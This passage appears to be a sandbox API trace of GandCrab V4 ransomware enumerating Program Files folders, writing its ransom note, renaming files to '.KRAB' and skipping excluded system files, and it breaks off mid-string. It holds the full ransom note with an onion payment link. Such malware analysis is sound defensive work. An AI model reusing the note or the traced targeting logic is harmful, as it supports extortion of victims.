out: lpFindFileData=0x338f9d0) returned 1 [0041.436] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0041.436] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0041.436] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0041.436] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0041.436] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.436] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.437] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.437] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Program Files\\\\KRAB-DECRYPT.txt") returned 34 [0041.437] CreateFileW (lpFileName="C:\\Program Files\\\\KRAB-DECRYPT.txt" (normalized: "c:\\program files\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0041.437] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.437] WriteFile (in: hFile=0x28c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.438] CloseHandle (hObject=0x28c) returned 1 [0041.438] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.439] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.439] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x27d)) [0041.439] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.439] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.439] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.439] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock") returned 40 [0041.439] CreateFileW (lpFileName="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\program files\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x28c [0041.440] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.440] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.440] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0041.440] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*" | out: lpString1="C:\\Program Files\\*") returned="C:\\Program Files\\*" [0041.440] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xf8a408 [0041.440] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.440] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.441] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.441] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.441] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0041.441] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0041.441] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Common Files" | out: lpString1="C:\\Program Files\\Common Files") returned="C:\\Program Files\\Common Files" [0041.441] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.441] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.441] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.441] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock" [0041.441] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.441] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 45 [0041.441] lstrlenW (lpString="C:\\Program Files\\d2ca4a08d2ca4dee3d.lock") returned 40 [0041.441] lstrlenW (lpString=".lock") returned 5 [0041.441] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.441] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.441] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.442] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.442] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.442] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.442] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.442] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="desktop.ini" | out: lpString1="C:\\Program Files\\desktop.ini") returned="C:\\Program Files\\desktop.ini" [0041.442] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.442] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files\\desktop.ini.KRAB") returned 33 [0041.442] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0041.442] lstrlenW (lpString=".ini") returned 4 [0041.442] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.442] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".ini ") returned 5 [0041.442] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.443] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0041.443] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0041.443] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0041.443] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.443] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.443] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0041.443] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0041.443] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Internet Explorer" | out: lpString1="C:\\Program Files\\Internet Explorer") returned="C:\\Program Files\\Internet Explorer" [0041.443] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.443] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0041.443] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0041.443] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Java" | out: lpString1="C:\\Program Files\\Java") returned="C:\\Program Files\\Java" [0041.443] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.443] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.443] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.443] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Program Files\\KRAB-DECRYPT.txt") returned="C:\\Program Files\\KRAB-DECRYPT.txt" [0041.443] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.443] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files\\KRAB-DECRYPT.txt.KRAB") returned 38 [0041.443] lstrlenW (lpString="C:\\Program Files\\KRAB-DECRYPT.txt") returned 33 [0041.444] lstrlenW (lpString=".txt") returned 4 [0041.444] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.444] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.444] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.444] lstrlenW (lpString="C:\\Program Files\\KRAB-DECRYPT.txt") returned 33 [0041.444] lstrlenW (lpString="C:\\Program Files\\KRAB-DECRYPT.txt") returned 33 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.444] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.444] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.444] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.444] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office" | out: lpString1="C:\\Program Files\\Microsoft Office") returned="C:\\Program Files\\Microsoft Office" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Microsoft Office 15", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Microsoft Office 15", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office 15" | out: lpString1="C:\\Program Files\\Microsoft Office 15") returned="C:\\Program Files\\Microsoft Office 15" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="MSBuild" | out: lpString1="C:\\Program Files\\MSBuild") returned="C:\\Program Files\\MSBuild" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Reference Assemblies" | out: lpString1="C:\\Program Files\\Reference Assemblies") returned="C:\\Program Files\\Reference Assemblies" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Uninstall Information" | out: lpString1="C:\\Program Files\\Uninstall Information") returned="C:\\Program Files\\Uninstall Information" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Defender" | out: lpString1="C:\\Program Files\\Windows Defender") returned="C:\\Program Files\\Windows Defender" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows Journal", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Windows Journal", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Journal" | out: lpString1="C:\\Program Files\\Windows Journal") returned="C:\\Program Files\\Windows Journal" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Mail" | out: lpString1="C:\\Program Files\\Windows Mail") returned="C:\\Program Files\\Windows Mail" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Media Player" | out: lpString1="C:\\Program Files\\Windows Media Player") returned="C:\\Program Files\\Windows Media Player" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2=".") returned 1 [0041.445] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2="..") returned 1 [0041.445] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Multimedia Platform" | out: lpString1="C:\\Program Files\\Windows Multimedia Platform") returned="C:\\Program Files\\Windows Multimedia Platform" [0041.445] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.445] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0041.446] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0041.446] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows NT" | out: lpString1="C:\\Program Files\\Windows NT") returned="C:\\Program Files\\Windows NT" [0041.446] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.446] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0041.446] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0041.446] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Photo Viewer" | out: lpString1="C:\\Program Files\\Windows Photo Viewer") returned="C:\\Program Files\\Windows Photo Viewer" [0041.446] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.446] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0041.446] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0041.446] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Portable Devices" | out: lpString1="C:\\Program Files\\Windows Portable Devices") returned="C:\\Program Files\\Windows Portable Devices" [0041.446] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.446] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0041.446] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0041.446] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Program Files\\Windows Sidebar") returned="C:\\Program Files\\Windows Sidebar" [0041.446] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.446] lstrcmpW (lpString1="WindowsApps", lpString2=".") returned 1 [0041.446] lstrcmpW (lpString1="WindowsApps", lpString2="..") returned 1 [0041.447] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="WindowsApps" | out: lpString1="C:\\Program Files\\WindowsApps") returned="C:\\Program Files\\WindowsApps" [0041.447] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.447] lstrcmpW (lpString1="WindowsPowerShell", lpString2=".") returned 1 [0041.447] lstrcmpW (lpString1="WindowsPowerShell", lpString2="..") returned 1 [0041.447] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="WindowsPowerShell" | out: lpString1="C:\\Program Files\\WindowsPowerShell") returned="C:\\Program Files\\WindowsPowerShell" [0041.447] FindNextFileW (in: hFindFile=0xf8a408, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0041.447] FindClose (in: hFindFile=0xf8a408 | out: hFindFile=0xf8a408) returned 1 [0041.447] CloseHandle (hObject=0x28c) returned 1 [0041.447] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.447] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0041.447] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0041.447] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0041.447] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0041.447] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.447] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.447] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.448] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.448] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Program Files (x86)\\\\KRAB-DECRYPT.txt") returned 40 [0041.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\KRAB-DECRYPT.txt" (normalized: "c:\\program files (x86)\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0041.448] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9